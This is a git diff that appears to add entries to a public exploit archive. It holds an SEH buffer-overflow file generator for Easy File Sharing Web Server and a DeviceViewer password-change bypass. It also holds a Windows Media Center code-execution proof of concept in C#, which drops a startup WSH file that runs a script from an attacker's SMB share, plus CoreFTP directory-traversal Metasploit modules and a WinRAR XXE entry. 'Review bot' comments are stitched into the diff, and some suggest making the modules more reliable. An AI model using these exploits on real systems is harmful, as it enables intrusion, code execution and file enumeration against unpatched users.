ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) + +nseh = "\xEB\x06\x90\x90" +seh = "\xF2\x95\x01\x10" + +payload = "A" * 4059 +payload += nseh +payload += seh +payload += "\x90" * 16 +payload += shellcode +payload += "D" *4000 + +# SEH chain of main thread, item 1 +# Address=46336646 +# SE handler=*** CORRUPT ENTRY *** + +# Log data, item 34 +# Address=0BADF00D +# Message= SEH record (nseh field) at 0x0018a938 overwritten with normal pattern : 0x46336646 (offset 4059), followed by 933 bytes of cyclic data after the handler +# [*] Exact match at offset 4059 + +try: + evilCreate =open("exploit.txt","w") + print(""" + Easy File Sharing web 
server SEH overflow + """) + print("[x] Creating malicious file") + evilCreate.write(payload) + evilCreate.close() + print("[x] Malicious file create") + print("[x] Go to user accounts and add a new user with malicious name") + print("[x] Watch the program crash") +except: + print("[!] File failed to be created") \ No newline at end of file diff --git a/exploits/windows/local/47476.py b/exploits/windows/local/47476.py new file mode 100755 index 000000000..2bddfb3aa --- /dev/null +++ b/exploits/windows/local/47476.py @@ -0,0 +1,33 @@ +# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change +# Date: 2019-09-10 +# Exploit Author: Alessandro Magnosi +# Vendor Homepage: http://www.sricam.com/ +# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe +# Version: v3.12.0.1 +# Tested on: Windows 7 + +#!/usr/bin/python + +# Steps to reproduce: +# 1. Generate the payload executing the PoC +# 2. Login in the Sricam DeviceViewer application as any registered user +# 3. Go to System Tools -> Change Password +# 4. Set the old password as the malicious payload, and the new password as whatever you want +# 5. The password will be changed with the new one +# 6. To confirm, restart the application and try to login with the new password + +payload = "A" * 5000 + +try: + bypass = open("bypass.txt","w") + print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass") + print("### Author: Alessandro Magnosi\n") + print("[*] Creating old password file") + bypass.write(payload) + bypass.close() + print("[+] Old password file created\n") + print("[i] When changing password, set the old password to the file contents") + print("[i] Close the program and reopen it") + print("[i] Log in with new password") +except: + print("[!] Error creating the file") \ No newline at end of file diff --git a/exploits/windows/local/47981.txt b/exploits/windows/local/47981.txt new file mode 100644 index 000000000..b0741eb78 --- /dev/null +++ b/exploits/windows/local/47981.txt 
@@ -0,0 +1,620 @@ +# Exploit Title: Microsoft Windows Media Center WMV or WMA 6.3.9600.16384 - Code Execution +# Google Dork: n/a +# Date: 2020-01-29 +# Exploit Author: Eduardo Braun Prado +# Vendor Homepage: http://www.microsoft.com/ +# Software Link: http://www.microsoft.com/ +# Version: 6.3.9600.16384 +# Tested on: Windows 7, 8.1, 10 +# CVE : N/A +# Discovered by: Eduardo Braun Prado + +# Microsoft Windows Media Center WMV/WMA File FormatParsing Security Bypass Arbitrary Code Execution Vulnerability PoC - C# +[Details] + +Microsoft Windows Media Center, the very popular app still used by many +people, (that can play a variety of file types and originally designed +for playback and recording of TV shows from TV´s cable/antenna) is +affected by an issue that allows malicious people to bypass the current +security standards of the app, + +including modern browser security standards which could ultimately lead +to arbitrary code execution. + +The issue can be exploited through specially crafted 'wma' or 'wmv' file +containing a script instruction called 'URL'. + + +1) Currently Windows Media Center prompts before opening links no matter +what protocol is used (eg. 'http:' versus 'file:') + +If the user accepts the prompt it will be passed to the default web browser. + +2) Windows Media Center allows unsafe 'file:' URIs, which facilitates +attacks that abuses local file system access. + + +By combining these 2 issues attackers may be able to reference a local +html file in the context of MS IE core, which is hosted + +by a Media Center 'plugin' (ehexthost32). 
Because usually local files +are parsed in the privileged Local Machine security zone, +it´s possible to run arbitrary code on the target system, because: + +- Windows Media Center´s extensibility host (ehexthost32) does not +enable the security feature 'Local Machine Zone Lockdown' +(FEATURE_LOCALMACHINE_LOCKDOWN) + +Therefore attackers might be able to compromise the target system if +they can exploit an Universal Cross Site Scripting (uXSS) issue, + +or plant a file in a predictable location, with custom content. + +If it used the 'FEATURE_LOCALMACHINE_LOCKDOWN', the severity of the +attack could be considerably reduced. + + +2 PoCs are provided. + + +The first assumes the attacker could have already planted an html based +file on the target and the user saved/copied the WMV video +to his/her 'Videos' folder. + +So, by opening Windows Media Center and navigating through the resources +displayed on the screen (click "Videos", then an embedded file browser is + +displayed, so you can click the PoC WMV file) it will start playing the +video and exploit will be triggered. + + +The second involves the target user opening an ASX playlist that +references the first WMV file that could be located on a web site or +SMB/WebDAV location + +and further displaying a picture with text 'Click me'. Upon playing the +first WMV file, an 'HTTP:' URL is displayed (it belongs to the default +'Internet' +security zone of Windows) and by this time the attacker either uses a +predictable file creation issue or a uXSS vulnerability. In case the +attacker does not +have a mean to navigate from the 'Internet' zone to the 'Local Machine' +zone, when the target clicks the picture, the second WMV file is played +and it contains +code to retrieve a local file, using the 'file:' URL protocol. 
Windows +Media Center was supposed to either changing the location of the current +window or +opening a new one (on the same or new instance of 'Ehexthost32' app), +but due to a "bug" it freezes in the first URL. + +The "FEATURE_ZONE_ELEVATION", used by 'Ehexthost32' app sets additional +security regarding zone elevation blocks, in other words, makes it +harder to navigate +from the 'Internet' (or even 'Trusted Sites' and 'Local Intranet') zone +to the 'Local Machine'. + +The PoCs use the 'System Monitor Control' ActiveX to create a simple WSH +file (shortcut to script files) to the user´s startup dir. +This is possible because code is parsed in the context of the Local +Machine zone ("unlocked") of Windows. + + +[video demo] + +video demo1: https://www.youtube.com/watch?v=ubom8OMjfDw + +video demo2: https://www.youtube.com/watch?v=ECto30VbiHk + + +[PoC] + +Instructions: + + - Create a new project on MS Visual Studio (any version, included free +ones like 'Express'), choose 'Console Application' + +and at 'program . cs' replace the code with the code below; After +compiled, the binary can be run without parameters (creates PoC1) or +with 3 parameters which are: + +1) remote URL: an internet address you wish, eg. your website...it +could have eg. code to plant a predictable file on the target. +2) local URL: a 'file:' based address to referenced an arbitrary local +file (eg. you could have just planted a predictable file, now you wish +to retrieve it) +3) SMB path: path to your SMB server (must allow anonymous access) where +a custom script file is located and will be run on next boot. + +Note: Source code targets dot NET 4.0 and up (previous versions might +work fine though!) 
+ + +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; +using System.Threading.Tasks; +using System.Runtime.Remoting.Metadata.W3cXsd2001; + +namespace wmc_wmv +{ + class Program + { + static void Main(string[] args) + { + String exeDir = AppDomain.CurrentDomain.BaseDirectory; + Directory.SetCurrentDirectory(exeDir); + + string welcome = "\n\n +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n Microsoft Windows Media Center '.wmv' Security Bypass Vulnerability +Arbitrary Code Execution \n\n by: Eduardo Braun Prado \n\n +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"; + + string howto = "\n\n Usage: wmc_wmv URL_Remote URL_Local +SMBPath \n\n\n Note: If you don´t pass any arguments, we use PoC1."; + + + string t1 = "31"; + string t2 = "32"; + + string wmvs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string wmve1 = +"3326B2758E66CF11A6D900AA0062CE6C32000000000000001000000000000000000056006900640065006F002000"; + string wmve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string htmld1 = +"3C48544D4C3E3C424F4459206F6E6C6F61643D626C6F616428293E0D0A3C4F424A4543542049443D736D2057494454483D31204845494748543D3120434C41535349443D434C5349443A43344432443845302D443144442D313143452D393430462D3030383032393030343334373E0D0A3C504152414D204E414D453D2247726170685469746C65222056414C55453D220D0A5B53637269707446696C655D0D0A506174683D"; + string htmld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string pngd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string asxd = +"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"; + string default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string default_smbP = +"5C5C3132372E302E302E315C63245C70726F6772616D64617461"; + + string tmpPath = Path.GetTempPath(); + + string prof = +Environment.GetFolderPath(Environment.SpecialFolder.UserProfile); + + string videos = prof + "\\Videos"; + + int 
URL_Max = 258; + + + string[] cargs = Environment.GetCommandLineArgs(); + + + + + int a = cargs.Length; + + + + if (a <= 1) { Console.WriteLine(welcome); + + Console.ForegroundColor = ConsoleColor.Blue; + + Console.WriteLine(howto); + + Console.ForegroundColor = ConsoleColor.Gray; + + + if (!Directory.Exists(exeDir + "\\PoC1")) { + Directory.CreateDirectory(exeDir + "\\PoC1"); + } + + if (Directory.Exists("C:\\programdata")) + { + StreamWriter fw = File.CreateText(tmpPath + +"\\wmc0001.h"); + + fw.Write(htmld1); + fw.Write(default_smbP); + fw.Write(htmld2); + fw.Close(); + + FileStream fs0 = File.OpenRead(tmpPath + "\\wmc0001.h"); + + String ax = ""; + + + byte[] b0 = new byte[fs0.Length]; + + UTF8Encoding temp0 = new UTF8Encoding(false); + + while (fs0.Read(b0, 0, b0.Length) > 0) + { + ax = ax + temp0.GetString(b0); + } + + + String bx = ax.ToString(); + String cx = ""; + + byte[] b02 = new byte[fs0.Length / 2]; + for (int i = 0; i < fs0.Length; i += 2) + { + cx = bx.Substring(i, 2); + b02[i / 2] = Convert.ToByte(cx, 16); + } + + File.WriteAllBytes("c:\\programdata\\wmc.htm", b02); + } + StreamWriter fw1 = File.CreateText(tmpPath + +"\\default0001.h"); + + fw1.Write(wmvs); + fw1.Write(default_URL); + fw1.Write(wmve1); + fw1.Write(t1); + fw1.Write(wmve2); + fw1.Close(); + + FileStream fs1 = File.OpenRead(tmpPath + "\\default0001.h"); + + String ax1 = ""; + + + byte[] b = new byte[fs1.Length]; + + UTF8Encoding temp = new UTF8Encoding(false); + + while (fs1.Read(b, 0, b.Length) > 0) + { + ax1 = ax1 + temp.GetString(b); + } + + + String bx1 = ax1.ToString(); + String cx1 = ""; + + byte[] b2 = new byte[fs1.Length / 2]; + for (int i = 0; i < fs1.Length; i += 2) + { + cx1 = bx1.Substring(i, 2); + b2[i / 2] = Convert.ToByte(cx1, 16); + } + + File.WriteAllBytes(videos + "\\wmc0001.wmv", b2); + + Console.WriteLine("\n\n\n\n Done! 
'wmc0001.wmv' created +on your 'Videos' folder; 'wmc.htm' created on your programdata folder; +\n Upon successfully testing this item a WSH file is dropped to your +startup folder. \n Place a custom 'wmc" + "." + " vbs' file on your +programdata folder because it will be retrieved on next boot."); + + Environment.Exit(0); } + + + else if (a == 2 || a < 4) { Console.ForegroundColor = +ConsoleColor.Red; Console.WriteLine("\n\n\n\n Failed. You need to +provide all required arguments; Try again!"); Environment.Exit(0); } + + + else + { + + // POC 2 + + Console.WriteLine(welcome); + + Console.ForegroundColor = ConsoleColor.Blue; + + Console.WriteLine(howto); + + Console.ForegroundColor = ConsoleColor.Gray; + + + + string strsearch = "| "; + + string cxs = string.Join(strsearch, cargs); + + + + int c1 = cxs.IndexOf(strsearch, 0); + + int c2 = cxs.IndexOf(strsearch, c1 + 1); + + int c3 = cxs.IndexOf(strsearch, c2 + 1); + + + + + + string carg1 = cxs.Substring(c1 + strsearch.Length, +c2 - c1 - strsearch.Length); + + string carg2 = cxs.Substring(c2 + strsearch.Length, +c3 - c2 - strsearch.Length); + + string carg3 = cxs.Substring(c3 + strsearch.Length); + + + if (carg1.Length > URL_Max || carg2.Length > URL_Max) + { + Console.ForegroundColor = ConsoleColor.Red; +Console.WriteLine("\n\n\n\n Error: The URLs cannot exceed 258 chars. 
Try +again!"); + + Console.ForegroundColor = ConsoleColor.Gray; + } + + else + { + int cx1 = carg1.Length; + int cx2 = carg2.Length; + + while (cx1 < URL_Max) + { + carg1 = carg1 + "*"; + cx1++; + } + + while (cx2 < URL_Max) + { + carg2 = carg2 + "*"; + cx2++; + } + } + + + if (!Directory.Exists(exeDir + "\\PoC2")) + { + Directory.CreateDirectory(exeDir + "\\PoC2"); + } + + + + byte[] ba1 = Encoding.Default.GetBytes(carg1); + + string hex1 = BitConverter.ToString(ba1); + + hex1 = hex1.Replace("-", "00"); // transform ASCII +HEX String into Unicode HEX String + + hex1 = hex1.Replace("2A", "00"); + + string url_remote = hex1 + "00"; // appends null +byte to the last byte + + + byte[] ba2 = Encoding.Default.GetBytes(carg2); + + string hex2 = BitConverter.ToString(ba2); + + hex2 = hex2.Replace("-", "00"); + + hex2 = hex2.Replace("2A", "00"); + + string url_local = hex2 + "00"; + + + byte[] ba3 = Encoding.Default.GetBytes(carg3); + + string hex3 = BitConverter.ToString(ba3); + + string smb_path = hex3.Replace("-", ""); + + + if (Directory.Exists(exeDir + "\\PoC2")) + { + StreamWriter fw4 = File.CreateText(tmpPath + +"\\wmc0002.h"); + + fw4.Write(htmld1); + fw4.Write(smb_path); + fw4.Write(htmld2); + fw4.Close(); + + FileStream fs4 = File.OpenRead(tmpPath + +"\\wmc0002.h"); + + String ax4 = ""; + + + byte[] b4 = new byte[fs4.Length]; + + UTF8Encoding temp4 = new UTF8Encoding(false); + + while (fs4.Read(b4, 0, b4.Length) > 0) + { + ax4 = ax4 + temp4.GetString(b4); + } + + + String bx4 = ax4.ToString(); + String cx4 = ""; + + byte[] b04 = new byte[fs4.Length / 2]; + for (int i = 0; i < fs4.Length; i += 2) + { + cx4 = bx4.Substring(i, 2); + b04[i / 2] = Convert.ToByte(cx4, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\wmc.htm", b04); + + + + StreamWriter fw5 = File.CreateText(tmpPath + +"\\asx0002.h"); + + fw5.Write(asxd); + + fw5.Close(); + + FileStream fs5 = File.OpenRead(tmpPath + +"\\asx0002.h"); + + String ax5 = ""; + + + byte[] b5 = new byte[fs5.Length]; + + 
UTF8Encoding temp5 = new UTF8Encoding(false); + + while (fs5.Read(b5, 0, b5.Length) > 0) + { + ax5 = ax5 + temp5.GetString(b5); + } + + + String bx5 = ax5.ToString(); + String cx5 = ""; + + byte[] b05 = new byte[fs5.Length / 2]; + for (int i = 0; i < fs5.Length; i += 2) + { + cx5 = bx5.Substring(i, 2); + b05[i / 2] = Convert.ToByte(cx5, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\wmc" + "." ++ "asx", b05); + + + + StreamWriter fw6 = File.CreateText(tmpPath + +"\\png0002.h"); + + fw6.Write(pngd); + + fw6.Close(); + + FileStream fs6 = File.OpenRead(tmpPath + +"\\png0002.h"); + + String ax6 = ""; + + + byte[] b6 = new byte[fs6.Length]; + + UTF8Encoding temp6 = new UTF8Encoding(false); + + while (fs6.Read(b6, 0, b6.Length) > 0) + { + ax6 = ax6 + temp6.GetString(b6); + } + + + String bx6 = ax6.ToString(); + String cx6 = ""; + + byte[] b06 = new byte[fs6.Length / 2]; + for (int i = 0; i < fs6.Length; i += 2) + { + cx6 = bx6.Substring(i, 2); + b06[i / 2] = Convert.ToByte(cx6, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\1.png", b06); + + + + StreamWriter fw7 = File.CreateText(tmpPath + +"\\wmv0001.h"); + + fw7.Write(wmvs); + fw7.Write(url_remote); + fw7.Write(wmve1); + fw7.Write(t1); + fw7.Write(wmve2); + + fw7.Close(); + + FileStream fs7 = File.OpenRead(tmpPath + +"\\wmv0001.h"); + + String ax7 = ""; + + + byte[] b7 = new byte[fs7.Length]; + + UTF8Encoding temp7 = new UTF8Encoding(false); + + while (fs7.Read(b7, 0, b7.Length) > 0) + { + ax7 = ax7 + temp7.GetString(b7); + } + + + String bx7 = ax7.ToString(); + String cx7 = ""; + + byte[] b07 = new byte[fs7.Length / 2]; + for (int i = 0; i < fs7.Length; i += 2) + { + cx7 = bx7.Substring(i, 2); + b07[i / 2] = Convert.ToByte(cx7, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\1.wmv", b07); + + + StreamWriter fw8 = File.CreateText(tmpPath + +"\\wmv0002.h"); + + fw8.Write(wmvs); + fw8.Write(url_local); + fw8.Write(wmve1); + fw8.Write(t2); + fw8.Write(wmve2); + + fw8.Close(); + + FileStream fs8 = 
File.OpenRead(tmpPath + +"\\wmv0002.h"); + + String ax8 = ""; + + + byte[] b8 = new byte[fs8.Length]; + + UTF8Encoding temp8 = new UTF8Encoding(false); + + while (fs8.Read(b8, 0, b8.Length) > 0) + { + ax8 = ax8 + temp8.GetString(b8); + } + + + String bx8 = ax8.ToString(); + String cx8 = ""; + + byte[] b08 = new byte[fs8.Length / 2]; + for (int i = 0; i < fs8.Length; i += 2) + { + cx8 = bx8.Substring(i, 2); + b08[i / 2] = Convert.ToByte(cx8, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\2.wmv", b08); + + + Console.WriteLine("\n\n\n\n Done! All files +written to 'PoC2' folder. Begin by opening the 'wmc" + "." + " a s x' +file with Windows Media Center. \n If it succeeds a WSH file is dropped +to startup folder and will retrieve and run a 'wmc'" + "." + " vbs' file +from the SMB location you provided."); + + Environment.Exit(0); + + } + } + + } + } +} \ No newline at end of file diff --git a/exploits/windows/remote/48194.txt b/exploits/windows/remote/48194.txt new file mode 100644 index 000000000..f1b6349ac --- /dev/null +++ b/exploits/windows/remote/48194.txt 
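Review bot: The write-up in 47981.txt never lists what the generated program leaves on the test machine, although the code shows several artifacts: intermediate `*.h` files under `Path.GetTempPath()` that are never deleted, `c:\programdata\wmc.htm`, `wmc0001.wmv` in the user's Videos folder and, per the final console message, a WSH file in the startup folder once the media file has been played. A short artifacts and clean-up section after `[PoC]` naming these paths would let a tester restore the lab host and gives defenders concrete locations to check; the `[Details]` text already identifies the relevant hardening, `FEATURE_LOCALMACHINE_LOCKDOWN` for `ehexthost32`, and that section could repeat it in one line as the mitigation. In the code, every `File.OpenRead` stream (`fs0`, `fs1`, `fs4` to `fs8`) is left open; `using (FileStream fs0 = File.OpenRead(...)) { ... }` would release the handles. Parts of the string constants are elided in this view, so they are not covered here.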
@@ -0,0 +1,48 @@
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::Ftp
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+ def proto
+ 'ftp'
+ end
+ def initialize
+ super(
+ 'Name' => 'CVE-2019-9648 CoreFTP FTP Server Version 674 and below SIZE Directory Traversal',
+ 'Description' => %q{An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a \..\..\ substring, allowing an attacker to enumerate file existence based on the returned information},
+ 'Author' => [ 'Kevin Randall' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2019-9648' ],
+ [ 'BID', '107446' ],
+ [ 'URL', 'https://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509' ]
+ ],
+ 'Disclosure Date:' => 'March 13 2019'
+ )
+ register_options([
+ Opt::RPORT(21),
+ OptString.new('FILENAME', [true, "Name of file to search on remote server", 'nslookup.exe'] ),
+ OptString.new('PATHTRAVERSAL', [true, "Traversal path Note: Default Drive used is C: ", "\\..\\..\\..\\..\\"] ),
+ OptString.new('PATHTOFILE', [ true, 'local filepath to the specified file. Please add double slashes for escaping', 'Windows\\System32\\'] )
+ ])
+ end
+ def run_host(ip)
+ print_status("Logging into FTP server now with supplied credentials")
+ c = connect_login
+ return if not c
+ print_status("Performing exploitation of the SIZE command to enumerate files")
+ path = datastore['PATHTRAVERSAL'] + datastore['PATHTOFILE'] + "\\" + datastore['FILENAME']
+ res = send_cmd( ['SIZE', "C: ", path ], true, nsock = self.sock)
+ data = res.to_s
+ print_status("Performing analysis.... Please wait")
+ if (data.include? "213" )
+ print_good ("And the circle hits the square!")
+ print_good ("File Exists. Here is the filesize:"+ data[4..-1])
+ return res
+ else
+ print_error("Mission Failed We'll get them next time!")
+ print_error ("Something went wrong or the file does not exist. Please check your variables PATHTRAVERSAL and PATHTOFILE (please escape double backslash) or verify file extension as it may be incorrect")
+ return res
+ end
+ end
+ end
\ No newline at end of file
diff --git a/exploits/windows/remote/48195.txt b/exploits/windows/remote/48195.txt
new file mode 100644
index 000000000..8b6062cc2
--- /dev/null
+++ b/exploits/windows/remote/48195.txt
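Review bot: The success test `if (data.include? "213" )` in `run_host` matches those digits anywhere in the server reply, so an error reply whose text happens to contain 213 is reported as "File Exists" and `data[4..-1]` then prints part of the error text as the size. Anchoring on the reply code, `if data.start_with?('213 ')`, keeps the result trustworthy for anyone using the module to confirm exposure to CVE-2019-9648. The metadata key `'Disclosure Date:'` is not the `'DisclosureDate'` key Metasploit modules normally set, so the date is probably not picked up; `'DisclosureDate' => 'Mar 13 2019'` is the usual form. Both points apply unchanged to the MDTM module added as 48195.txt, and both modules include `Msf::Auxiliary::Report` without any `report_*` call that records the finding.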
@@ -0,0 +1,48 @@ +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Ftp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + def proto + 'ftp' + end + def initialize + super( + 'Name' => 'CVE-2019-9649 CoreFTP FTP Server Version 674 and below MDTM Directory Traversal', + 'Description' => %q{An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. Using the MDTM FTP command, a remote attacker can use a directory traversal (..\..\) to browse outside the root directory to determine the existence of a file on the operating system, and the last mofidied date.}, + 'Author' => [ 'Kevin Randall' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2019-9649' ], + [ 'BID', '107449' ], + [ 'URL', 'https://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509' ] + ], + 'Disclosure Date:' => 'March 13 2019' + ) + register_options([ + Opt::RPORT(21), + OptString.new('FILENAME', [true, "Name of file to search on remote server", 'nslookup.exe'] ), + OptString.new('PATHTRAVERSAL', [true, "Traversal path Note: Default Drive used is C: ", "\\..\\..\\..\\..\\"] ), + OptString.new('PATHTOFILE', [ true, 'local filepath to the specified file. Please add double slashes for escaping', 'Windows\\System32\\'] ) + ]) + end + def run_host(ip) + print_status("Logging into FTP server now with supplied credentials") + c = connect_login + return if not c + print_status("Performing exploitation of the MDTM command to enumerate files") + path = datastore['PATHTRAVERSAL'] + datastore['PATHTOFILE'] + "\\" + datastore['FILENAME'] + res = send_cmd( ['MDTM', "C: ", path ], true, nsock = self.sock) + data = res.to_s + print_status("Performing analysis.... Please wait") + if (data.include? "213" ) + print_good ("And the circle hits the square!") + print_good ("File Exists. 
Here is the last modified date for the file:"+ data[4..-1]) + return res + else + print_error("Mission Failed We'll get them next time!") + print_error ("Something went wrong or the file does not exist. Please check your variables PATHTRAVERSAL and PATHTOFILE (please escape double backslash) or verify file extension as it may be incorrect") + return res + end + end + end \ No newline at end of file diff --git a/exploits/xml/local/47526.txt b/exploits/xml/local/47526.txt new file mode 100644 index 000000000..60f9f0872 --- /dev/null +++ b/exploits/xml/local/47526.txt @@ -0,0 +1,38 @@ +# Exploit Title: winrar 5.80 - XML External Entity Injection +# Exploit Author: hyp3rlinx +# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe +# Version: 5.80 +# Tested on: Microsoft Windows Version 10.0.18362.418 64bit + +# POC + +1- python -m SimpleHTTPServer (listens Port 8000) +2- open winrar or any file.rar +3- help +4- help topics +5- Drag the exploit to the window + + +html file + + + + + + + +%dtd;]> +&send; + + + + + + +============================== +start.dtd + + +"> +%all; \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f01140a68..43ce6e9f5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
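Review bot: The `'Description'` string of the MDTM module misspells "modified" as `mofidied` ("and the last mofidied date"), which is what users see in the module's info output; it should read `last modified date`. The same string places the flaw in the "SFTP Server component", while the module logs in through `Msf::Exploit::Remote::Ftp` with `Opt::RPORT(21)`, so one sentence stating which service the check actually talks to would avoid confusion when results are triaged.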
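Review bot: The header of 47526.txt has no `# Date:` or `# CVE:` line, unlike the other submissions in this patch, and `# Vendor Homepage:` holds a direct installer download link rather than the vendor site. The index row this commit adds to files_exploits.csv dates the entry 2019-10-21, so `# Date: 2019-10-21` can be added as it stands. The numbered steps also stop at "Drag the exploit to the window" without saying what the observable result is or which build fixes it, so a closing sentence on impact and fixed version (if the vendor has shipped one) would make the entry usable for patch verification.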
@@ -6025,6 +6025,7 @@ id,file,description,date,author,type,platform,port
 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
 45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
 44972,exploits/linux/dos/44972.py,"OpenSLP 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
+44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
 45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
 45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
@@ -6578,6 +6579,9 @@ id,file,description,date,author,type,platform,port
 47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows,
 47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows,
 47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows,
+47393,exploits/windows/dos/47393.txt,"Notepad++ < 7.7 (x64) - Denial of Service",2019-09-16,"Bogdan Kurinnoy",dos,windows,
+47404,exploits/watchos/dos/47404.pl,"SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service",2019-09-20,"Emilio Revelo",dos,watchos,
+47406,exploits/watchos/dos/47406.py,"InputMapper 1.6.10 - Denial of Service",2019-09-23,elkoyote07,dos,watchos,
 47410,exploits/windows/dos/47410.py,"DeviceViewer 3.12.0.1 - 'creating user' Denial of Service",2019-09-24,x00pwn,dos,windows,
 47414,exploits/windows/dos/47414.txt,"Microsoft Windows cryptoapi - SymCrypt Modular Inverse Algorithm Denial of Service",2019-09-24,"Google Security Research",dos,windows,
 47415,exploits/ios/dos/47415.txt,"iMessage - Decoding NSSharedKeyDictionary Can Read Object Out of Bounds",2019-09-24,"Google Security Research",dos,ios,
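Review bot: The added rows 47404 and 47406 are filed under platform `watchos`, both in the path `exploits/watchos/dos/` and in the platform column, but their titles name desktop programs ("SpotIE Internet Explorer Password Recovery" and "InputMapper"), and the index elsewhere in this patch lists SpotIE 2.9.5 (row 47855) under `windows`. A wrong platform value means a search or an inventory check filtered on Windows misses these entries. The column and the directory should probably both read `windows`; this is worth confirming against the submissions before the rows are merged.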
@@ -6646,10 +6650,13 @@ id,file,description,date,author,type,platform,port
 47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
 47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
+47795,exploits/windows/dos/47795.py,"SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
 47800,exploits/php/dos/47800.py,"WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service",2019-12-17,roddux,dos,php,
+47801,exploits/windows/dos/47801.py,"XnConvert 1.82 - Denial of Service (PoC)",2019-12-23,Gokkulraj,dos,windows,
 47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
 47848,exploits/windows/dos/47848.py,"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
+47849,exploits/windows/dos/47849.py,"SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
 47853,exploits/windows/dos/47853.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
 47855,exploits/windows/dos/47855.py,"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
 47856,exploits/windows/dos/47856.py,"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
@@ -6667,6 +6674,7 @@ id,file,description,date,author,type,platform,port
 47869,exploits/windows/dos/47869.py,"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
 47870,exploits/windows/dos/47870.py,"SpotIM 2.2 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
 47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows,
+47872,exploits/windows/dos/47872.py,"SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
 47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
 47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows,
 47894,exploits/windows/dos/47894.py,"ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)",2020-01-09,ZwX,dos,windows,
@@ -6685,6 +6693,7 @@ id,file,description,date,author,type,platform,port
